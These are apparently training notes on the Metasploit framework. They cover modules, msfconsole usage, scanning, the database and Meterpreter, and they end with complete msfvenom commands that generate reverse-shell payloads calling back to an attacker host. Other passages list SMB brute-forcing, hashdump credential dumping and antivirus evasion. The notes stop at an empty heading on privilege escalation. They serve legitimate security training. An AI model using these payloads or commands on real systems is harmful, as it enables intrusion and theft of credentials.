Metasploit

Introduction

  • Metasploit is a widely used exploitation framework.
  • Metasploit has two main versions.
    • Metasploit Pro - Commercial version, supports automation, has a GUI.
    • Metasploit Framework - Open source, command line only.
  • Metasploit supports information gathering, scanning, exploit development, exploitation, post-exploitation, etc.
  • The main components of Metasploit are
    • msfconsole - Main command line interface.
    • Modules - Supporting modules such as exploits, scanners, payloads, etc.
    • Tools - Standalone tools such as msfvenom, pattern_create, pattern_offset, etc.
  • A few important terms to know are
    • Exploit - Piece of code that uses a vulnerability present in the target system.
    • Vulnerability - Design, code or logic flaw in the target system which could be exploited.
    • Payload - The code which runs on the target system. The exploit delivers the payload by taking advantage of the vulnerability, to achieve the result that the attacker wants.

Auxiliary

  • Supporting modules such as scanners, crawlers and fuzzers.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/auxiliary.

Encoders

  • Encodes the payload.
  • Encoders have limited success rates as antivirus solutions perform additional checks.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/encoders.

Evasion

  • Evasion modules are used to evade antivirus programs and have higher success rates than encoders.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/evasion.

Exploits

  • Exploits, neatly organized in the module tree.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/exploits.

NOPs

  • No Operation (NOP) instructions do nothing.
  • They are represented in the Intel x86 family by 0x90.
  • They are used as padding to achieve consistent payload sizes.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/nops.

Payloads

  • Payloads are the code that runs on the target system.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/payloads.
  • Payloads are further divided into 4 categories.
    • Adapters - Wrap a single payload to convert it into a different format.
    • Singles - Self-contained payloads.
    • Stagers - Responsible for setting up a connection between Metasploit and the target system. A staged payload first uploads a stager to the target machine, which then downloads the rest of the payload (the stage).
    • Stages - Downloaded by the stager.
  • In Metasploit payload names, single payloads have _ after the shell keyword and staged payloads have / after the shell keyword.
    • Single payload: generic/shell_reverse_tcp.
    • Staged payload: windows/x64/shell/reverse_tcp.
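The naming rule above can be turned into a small parser. This Python example is added here and is not part of the original notes or of Metasploit itself; the stage keyword list (shell, meterpreter) is an assumption, and the parser also covers names with no stage keyword, such as the cmd/unix/reverse_python payload used further down.

```python
"""Classify Metasploit payload names as single or staged (added example).

Rule from the notes: a stage keyword followed by "_" means a single,
self-contained payload; the keyword followed by "/" means a staged
payload (stager plus a separately delivered stage).
"""
from dataclasses import dataclass
from typing import Optional

# Assumed stage keywords; "shell" and "meterpreter" are the ones in the notes.
STAGE_KEYWORDS = ("shell", "meterpreter")


@dataclass(frozen=True)
class PayloadInfo:
    name: str
    kind: str               # "single" or "staged"
    stage: Optional[str]    # stage keyword, e.g. "meterpreter", or None
    stager: str             # connection part, e.g. "reverse_tcp"
    platform: str           # leading components, e.g. "windows/x64"


def classify_payload(name: str) -> PayloadInfo:
    """Parse a payload name such as windows/x64/shell/reverse_tcp."""
    parts = name.strip().strip("/").split("/")
    if len(parts) < 2 or any(not p for p in parts):
        raise ValueError(f"not a valid payload name: {name!r}")
    for i, part in enumerate(parts):
        if part in STAGE_KEYWORDS:
            # keyword as its own component: "/" follows, so it must have a stager
            if i + 1 == len(parts):
                raise ValueError(f"stage keyword without stager: {name!r}")
            return PayloadInfo(name, "staged", part,
                               "/".join(parts[i + 1:]), "/".join(parts[:i]))
        for kw in STAGE_KEYWORDS:
            if part.startswith(kw + "_"):
                # keyword joined by "_" to the connection type: single payload
                return PayloadInfo(name, "single", kw,
                                   part[len(kw) + 1:], "/".join(parts[:i]))
    # no stage keyword at all (e.g. cmd/unix/reverse_python): single payload
    return PayloadInfo(name, "single", None, parts[-1], "/".join(parts[:-1]))


if __name__ == "__main__":
    for n in ("generic/shell_reverse_tcp", "windows/x64/shell/reverse_tcp",
              "php/meterpreter_reverse_tcp", "cmd/unix/reverse_python"):
        print(classify_payload(n))
```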

Post exploitation

  • Useful after exploitation.
  • Found in path /opt/metasploit-framework/embedded/framework/modules/post.

Msfconsole

  • Launch with msfconsole command.
  • Search for an exploit using the search command.
    • search auxiliary
    • search auxiliary scanner ssh
    • search rank:excellent disclosure_date:2024 Windows
  • Select the exploit using the use command.
    • use auxiliary/dos/http/ws_dos
    • use 1599
  • Find more information about an exploit using the info command.
    • Before selecting, use info 1599 (the number from the search results).
    • After selecting, use the info command on its own.
  • Show all options for the exploit using the show options command. Options differ depending on the selected exploit.
  • The show command can be combined with arguments such as auxiliary, payloads, exploits, etc.
  • To view all the exploits use the show exploits command.
  • To view all the payloads compatible with the exploit use the show payloads command.
  • To leave the context of the exploit use the back command.
  • Exploit ranking: https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

Working with modules

  • There are 5 different prompts in metasploit.
    • root@ip-10-10-XX-XX:~# - Regular command prompt.
    • msf6 > - Msfconsole prompt.
    • msf6 exploit(windows/smb/ms17_010_eternalblue) > - Context prompt. Context specific options can be used here.
    • meterpreter > - Meterpreter prompt. The Meterpreter agent has loaded on the target system and connected back to the attacker's machine.
    • C:\Windows\system32> - Shell on the target system. All commands typed here will run on the target system.

Exploitation

  • Select the exploit using the use command.
  • Show options using show options command.
  • Set the context-specific values for the exploit using the set command.
  • Set global values (shared across modules) using the setg command.
  • Unset individual values using the unset or unsetg command.
  • Unset all values using unset all or unsetg all.
  • Use the check command to see whether the target is vulnerable. Not all modules support check.
  • Launch the attack using the exploit or run command.
  • The exploit command can be launched in the background using exploit -z.
  • Send a Meterpreter session to the background using the background command.
  • Show all background sessions using the sessions command.
  • Interact with a specific session using the sessions -i 2 command.

Scanning

  • search portscan - List all potential scanning modules.
  • use auxiliary/scanner/portscan/tcp - Select the TCP port scanner.
  • show options - Displays options for the module.
  • For faster scanning use nmap, e.g. nmap -sS 10.10.12.229.

UDP Service Identification

  • Use scanner/discovery/udp_sweep to find all services running over UDP.

SMB Scans

  • smb_enumshares and smb_version - Useful in corporate networks.

Useful Metasploit Scanner Modules

  • auxiliary/scanner/portscan/tcp - Find all open TCP ports.
  • scanner/smb/smb_login - Brute-force SMB logins.
  • auxiliary/scanner/netbios/nbname - Find NetBIOS information.
  • auxiliary/scanner/http/http_version - Show HTTP application version information.

Metasploit Database

  • When working on multiple targets, it can get confusing to keep track of parameter values.
  • Metasploit has a database function to simplify project management and setting parameter values.
  • To set up the database
    • Start the PostgreSQL database using systemctl start postgresql.
    • Initialize the Metasploit database using msfdb init.
    • Launch msfconsole.
    • Check the database status using db_status.
  • The Metasploit database has a workspace feature to isolate different projects.
    • workspace -h - Displays help information for the workspace command.
    • workspace -a <workspace_name> - Adds a new workspace.
    • workspace <workspace_name> - Switch to a workspace.
    • workspace -d <workspace_name> - Deletes a workspace.
    • workspace -D - Deletes all workspaces.
    • workspace -r <old_name> <new_name> - Renames a workspace.
  • Run db_nmap instead of nmap to save the results to the database.
  • View the collected host and service information using the hosts and services commands respectively.
  • Set the stored hosts as RHOSTS using the hosts -R command.
  • Search for a specific service using services -S <service_name> command.

Vulnerability Scanning

  • Use search to find modules related to the potential vulnerabilities identified by the scanner.
  • Use the info command to view details about a module.

Useful Meterpreter commands

  • help - View all the commands supported in meterpreter.
  • pwd - Print working directory.
  • ls - List the files in the current directory.
  • shell - Drop into a shell on the remote system.
  • download - Download a file from the remote system.
  • upload - Upload a file from the attacker machine to the remote machine.
  • sysinfo - Print system information.
  • search -f <file_name> - Find a file on the target system.
  • hashdump - Dump the password hashes of the users on the target system.

Msfvenom

  • Show the list of supported payloads using msfvenom -l payloads.
  • Show the list of supported output formats using msfvenom --list formats.
  • Encode a payload using -e. Encoding is not an effective way to bypass antivirus programs.

Handlers

  • use exploit/multi/handler - Selects the generic handler.
  • set payload <payload_type> - Sets the payload type.
  • set lhost <attacker_host_ip> - Sets the local host.
  • set lport <attacker_port_number> - Sets the port for communication.
  • run or exploit - Starts listening.

Payload Generation

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
  • Remove the leading comment and add ?> at the end of the generated payload file.

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python

msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

Escalate Privileges by Upgrading Shells